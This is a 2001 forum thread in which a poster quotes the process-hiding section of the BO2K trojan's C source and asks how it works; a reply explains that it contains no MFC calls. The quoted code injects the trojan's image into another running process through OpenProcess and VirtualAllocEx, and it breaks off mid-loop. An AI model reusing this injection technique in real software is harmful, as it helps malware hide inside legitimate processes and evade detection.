Here is some code from BO2K I really don't get. Keywords used in here are not clearly defined in any of the include files, and don't seem to be API functions. Does this have anything to do with those cute MFC thingies? (I don't really know C++, as you may have noticed... :o) Btw, I'm just trying to UNDERSTAND it, I'm not currently making a trojan of any kind.

		// -------------------------------------------------------
		// -- Process Hiding Code                               
		// -- Note that there are several different ways to do  
		// -- what this code does. Both of the methods presented
		// -- below were written specifically to avoid accessing
		// -- the original BO2K image on disk.
		// -- This way, the original BO2K disk file can be compressed
		// -- with all of the plugin attachments inside, and
		// -- the original executable can be moved around/deleted
		// -- while the BO2K server still runs.
		
		// Get another process and thread id
		PROCESSINFO *ppie,*ppi=CreateProcListSnapshot(NULL);
		DWORD dwThreadID, dwProcID;
		
		for(ppie=ppi;ppie!=NULL;ppie=ppie->next) {
			if(lstrcmpi(ppie->svApp,svProcess)==0) break;
		}
		if(ppie==NULL) return FALSE;
		
		dwProcID=ppie->dwProcID;
		dwThreadID=ppie->pThread->dwThreadID; // Get first thread (doesn't really matter)
		
		DestroyProcListSnapshot(ppi);
		
		// Make sure we aren't hopping into ourselves
		if(GetCurrentProcessId()==dwProcID) return FALSE;

		// Open process to inject code into
		HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcID);
		if(hProc==NULL) {
			DebugMessageBox(NULL,"Unable to open process","ERROR",MB_SETFOREGROUND);
			return FALSE;
		}
		
		// Free space for BO2K (in case we are restarting)
		pVirtualFreeEx(hProc,g_module,0,MEM_RELEASE);
		
		// Allocate space for BO2K to fit in the process
		DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(g_module))->SizeOfImage;
		char *pMem=(char *)pVirtualAllocEx(hProc,g_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
		if(pMem==NULL) {
			DebugMessageBox(NULL,"Couldn't VirtualAllocEx","Error",MB_SETFOREGROUND);
			return FALSE;
		}
		
		// Lets copy the entire bo2k process into this space.
		DWORD dwOldProt,dwNumBytes,i;
		MEMORY_BASIC_INFORMATION mbi;
		
		pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
		while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
			if(!(mbi.Protect & PAGE_GUARD)) {
				for(i=0;i
:D:D
Posted on 2001-02-17 06:18:00 by Qweerdy
The comments listed are actually very accurate to the code beneath it. Just take your time and try to understand it, piece by piece. I would say to try and convert it from C to Assembly, but I have no idea how you could test it! :) Oh, by the way, there's not a single MFC command in there so don't worry about that. :)
Posted on 2001-02-17 16:19:00 by Racso